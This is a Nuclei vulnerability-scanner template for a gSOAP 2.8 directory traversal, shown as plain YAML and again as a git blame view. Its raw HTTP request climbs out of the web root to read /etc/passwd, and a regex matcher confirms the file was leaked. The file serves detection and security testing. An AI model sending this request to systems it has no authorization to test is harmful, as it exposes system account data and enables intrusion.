nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml

id: gsoap-lfi

info:
  name: gSOAP 2.8 - Directory Traversal
  author: 0x_Akoko
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/47653
  tags: gsoap,lfi

requests:
  - raw:
      - |
        GET /../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
Create gSOAP-LFl.yaml 2021-09-05 03:07:47 +00:00			`id: gsoap-lfi`

			`info:`
			`name: gSOAP 2.8 - Directory Traversal`
			`author: 0x_Akoko`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/47653`
Create gSOAP-LFl.yaml 2021-09-05 03:07:47 +00:00			`tags: gsoap,lfi`

			`requests:`
Update gsoap-lfi.yaml 2021-09-06 12:04:51 +00:00			`- raw:`
			`- \|`
			`GET /../../../../../../../../../etc/passwd HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3`
			`Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7`
			`Connection: close`
Create gSOAP-LFl.yaml 2021-09-05 03:07:47 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`